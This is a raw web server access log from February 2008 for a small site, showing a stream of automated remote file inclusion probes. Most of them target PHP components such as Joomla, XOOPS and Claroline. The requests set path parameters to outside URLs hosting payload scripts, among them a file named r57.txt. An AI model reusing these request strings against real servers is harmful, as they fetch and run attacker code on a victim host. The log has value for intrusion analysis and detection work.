69.20.54.118 - - [25/Feb/2008:05:15:32 -0800] "GET /logs/access.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://avvvv.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
69.20.54.118 - - [25/Feb/2008:05:15:32 -0800] "GET /logs/access.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://avvvv.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
69.20.54.118 - - [25/Feb/2008:05:15:35 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://avvvv.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
69.20.54.118 - - [25/Feb/2008:05:15:35 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://avvvv.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
68.76.31.154 - - [25/Feb/2008:05:15:54 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
89.97.0.11 - - [25/Feb/2008:05:17:04 -0800] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.angelfire.com/linux/ryu1/117.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.toulouseangloexchange.com"
89.97.0.11 - - [25/Feb/2008:05:17:04 -0800] "GET //claroline/tracking/userLog.php?rootSys=http://www.angelfire.com/linux/ryu1/117.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.toulouseangloexchange.com"
80.67.21.105 - - [25/Feb/2008:05:17:39 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.toulouseangloexchange.com"
80.67.21.105 - - [25/Feb/2008:05:17:40 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.toulouseangloexchange.com"
74.54.45.2 - - [25/Feb/2008:05:18:28 -0800] "GET /logs/%3Cwbr%20/%3Eaccess.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.54.45.2 - - [25/Feb/2008:05:18:28 -0800] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.54.45.2 - - [25/Feb/2008:05:18:28 -0800] "GET /logs/%3Cwbr%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
83.143.84.82 - - [25/Feb/2008:05:18:51 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.118.85.129 - - [25/Feb/2008:05:19:03 -0800] "GET /logs/access_080211.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.118.85.129 - - [25/Feb/2008:05:19:03 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.118.85.129 - - [25/Feb/2008:05:19:04 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
60.248.89.72 - - [25/Feb/2008:05:20:23 -0800] "GET /logs/index3.php?page=http://cfemp.com/pdf/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.toulouseangloexchange.com"
60.248.89.72 - - [25/Feb/2008:05:21:03 -0800] "GET /index3.php?page=http://cfemp.com/pdf/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.toulouseangloexchange.com"
211.233.19.105 - - [25/Feb/2008:05:23:03 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.toulouseangloexchange.com"
211.233.19.105 - - [25/Feb/2008:05:23:03 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.toulouseangloexchange.com"
211.233.7.68 - - [25/Feb/2008:05:23:47 -0800] "GET /index.php?go=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
211.233.7.68 - - [25/Feb/2008:05:23:47 -0800] "GET /logs/index.php?go=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.toulouseangloexchange.com"
84.234.68.78 - - [25/Feb/2008:05:24:04 -0800] "GET /logs/access_080127.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.234.68.78 - - [25/Feb/2008:05:24:05 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.234.68.78 - - [25/Feb/2008:05:24:05 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
201.35.66.58 - - [25/Feb/2008:05:24:44 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
84.234.68.78 - - [25/Feb/2008:05:25:46 -0800] "GET /logs/access_080114.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.75.63.66 - - [25/Feb/2008:05:26:15 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.toulouseangloexchange.com"
216.75.63.66 - - [25/Feb/2008:05:26:15 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.toulouseangloexchange.com"
80.237.158.11 - - [25/Feb/2008:05:28:25 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.237.158.11 - - [25/Feb/2008:05:28:26 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.237.158.11 - - [25/Feb/2008:05:28:26 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
211.233.7.68 - - [25/Feb/2008:05:28:28 -0800] "GET /logs/%3Ehttp://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.toulouseangloexchange.com"
211.233.7.68 - - [25/Feb/2008:05:28:29 -0800] "GET /%3Ehttp://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.toulouseangloexchange.com"
84.234.68.78 - - [25/Feb/2008:05:28:51 -0800] "GET /logs/access_080127.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.234.68.78 - - [25/Feb/2008:05:28:51 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.234.68.78 - - [25/Feb/2008:05:28:51 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.234.68.78 - - [25/Feb/2008:05:30:23 -0800] "GET /logs/access_080114.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.233.7.68 - - [25/Feb/2008:05:30:28 -0800] "GET /index.php?go=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.toulouseangloexchange.com"
211.233.7.68 - - [25/Feb/2008:05:30:33 -0800] "GET /logs/index.php?go=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.toulouseangloexchange.com"
211.233.19.105 - - [25/Feb/2008:05:31:06 -0800] "GET /logs//update/update2.php?lang=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.toulouseangloexchange.com"
211.233.19.105 - - [25/Feb/2008:05:31:06 -0800] "GET //update/update2.php?lang=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
84.234.68.78 - - [25/Feb/2008:05:33:10 -0800] "GET /logs/access_080127.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.234.68.78 - - [25/Feb/2008:05:33:11 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.234.68.78 - - [25/Feb/2008:05:33:11 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.234.68.78 - - [25/Feb/2008:05:34:45 -0800] "GET /logs/access_080114.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.233.19.105 - - [25/Feb/2008:05:36:05 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
211.233.19.105 - - [25/Feb/2008:05:36:05 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
60.248.89.72 - - [25/Feb/2008:05:36:42 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://cfemp.com/pdf/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.toulouseangloexchange.com"
60.248.89.72 - - [25/Feb/2008:05:36:42 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://cfemp.com/pdf/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.toulouseangloexchange.com"
85.13.129.226 - - [25/Feb/2008:05:37:41 -0800] "GET /index.php?page=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
85.13.129.226 - - [25/Feb/2008:05:37:41 -0800] "GET /logs/index.php?page=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
85.13.129.226 - - [25/Feb/2008:05:38:10 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
85.13.129.226 - - [25/Feb/2008:05:38:12 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
85.214.67.190 - - [25/Feb/2008:05:39:43 -0800] "GET /logs/payment/secpay/config.inc.php?config%5broot_dir%5d=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.214.67.190 - - [25/Feb/2008:05:39:43 -0800] "GET /payment/secpay/config.inc.php?config%5broot_dir%5d=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.9.138 - - [25/Feb/2008:05:40:11 -0800] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
66.45.242.50 - - [25/Feb/2008:05:41:05 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
66.45.242.50 - - [25/Feb/2008:05:41:05 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
68.76.31.154 - - [25/Feb/2008:05:41:13 -0800] "GET /logs/access_071217.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
189.19.29.139 - - [25/Feb/2008:05:41:27 -0800] "GET /?mosConfig_absolute_path=http://h1.ripway.com/splinterox/r57.txt?? HTTP/1.1" 200 919 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.36.179.98 - - [25/Feb/2008:05:42:30 -0800] "GET /logs/access_080211.log/akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.179.98 - - [25/Feb/2008:05:42:30 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.179.98 - - [25/Feb/2008:05:42:30 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.179.98 - - [25/Feb/2008:05:42:36 -0800] "GET /logs/access_071210.log/akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
58.26.137.64 - - [25/Feb/2008:05:43:16 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
58.26.137.64 - - [25/Feb/2008:05:43:17 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
58.26.137.64 - - [25/Feb/2008:05:43:24 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
58.26.137.64 - - [25/Feb/2008:05:43:24 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
208.116.0.130 - - [25/Feb/2008:05:50:47 -0800] "GET /?mosConfig_absolute_path=http://www.syshd.de/cache/%20%20%20%20%20%20%20/isis.txt? HTTP/1.1" 200 919 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.toulouseangloexchange.com"
208.116.0.130 - - [25/Feb/2008:05:50:47 -0800] "GET /logs/?mosConfig_absolute_path=http://www.syshd.de/cache/%20%20%20%20%20%20%20/isis.txt? HTTP/1.1" 200 3941 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.toulouseangloexchange.com"
72.233.6.152 - - [25/Feb/2008:05:51:22 -0800] "GET /logs/access.log//citywriter/head.php?path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.233.6.152 - - [25/Feb/2008:05:51:22 -0800] "GET //citywriter/head.php?path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.233.6.152 - - [25/Feb/2008:05:51:23 -0800] "GET /logs//citywriter/head.php?path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.179.98 - - [25/Feb/2008:05:51:37 -0800] "GET /logs/access_080211.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.179.98 - - [25/Feb/2008:05:51:37 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.179.98 - - [25/Feb/2008:05:51:38 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.6.24.226 - - [25/Feb/2008:05:53:17 -0800] "GET /?M=A HTTP/1.0" 200 903 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
130.161.158.3 - - [25/Feb/2008:05:53:30 -0800] "GET /config.php?path_to_root=http://arcadiaz.free.fr/map/mambo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.toulouseangloexchange.com"
130.161.158.3 - - [25/Feb/2008:05:53:30 -0800] "GET /logs/config.php?path_to_root=http://arcadiaz.free.fr/map/mambo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.toulouseangloexchange.com"
87.106.9.138 - - [25/Feb/2008:05:54:20 -0800] "GET /logs/access.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.9.138 - - [25/Feb/2008:05:54:21 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.101.4.42 - - [25/Feb/2008:05:54:33 -0800] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
200.96.247.163 - - [25/Feb/2008:05:54:37 -0800] "GET /logs/access_071112.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
200.96.247.163 - - [25/Feb/2008:05:54:38 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
200.96.247.163 - - [25/Feb/2008:05:54:38 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
200.96.247.163 - - [25/Feb/2008:05:55:46 -0800] "GET /logs/access_071126.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
208.69.192.133 - - [25/Feb/2008:05:56:20 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
85.13.131.90 - - [25/Feb/2008:05:56:37 -0800] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ilegais.xpg.com.br/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
85.13.131.90 - - [25/Feb/2008:05:56:38 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ilegais.xpg.com.br/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
85.13.131.90 - - [25/Feb/2008:05:56:38 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ilegais.xpg.com.br/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
72.36.179.98 - - [25/Feb/2008:05:57:05 -0800] "GET /logs/access.log/index.php?lang=gr&filehttp://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.179.98 - - [25/Feb/2008:05:57:05 -0800] "GET /index.php?lang=gr&filehttp://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.36.179.98 - - [25/Feb/2008:05:57:05 -0800] "GET /logs/index.php?lang=gr&filehttp://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
87.106.48.129 - - [25/Feb/2008:05:57:52 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.48.129 - - [25/Feb/2008:05:57:53 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.48.129 - - [25/Feb/2008:05:57:53 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.13.131.90 - - [25/Feb/2008:05:58:06 -0800] "GET /logs/access_071126.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ilegais.xpg.com.br/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
201.31.30.226 - - [25/Feb/2008:05:59:23 -0800] "GET /logs/access_080204.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
201.31.30.226 - - [25/Feb/2008:05:59:25 -0800] "GET /logs/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.45.242.50 - - [25/Feb/2008:06:00:04 -0800] "GET /logs//cutenews/show_archives.php?cutepath=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
66.45.242.50 - - [25/Feb/2008:06:00:05 -0800] "GET //cutenews/show_archives.php?cutepath=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.toulouseangloexchange.com"
201.31.30.226 - - [25/Feb/2008:06:01:03 -0800] "GET /logs/access_080127.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.146.33.210 - - [25/Feb/2008:06:01:41 -0800] "GET /logs/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.toulouseangloexchange.com"
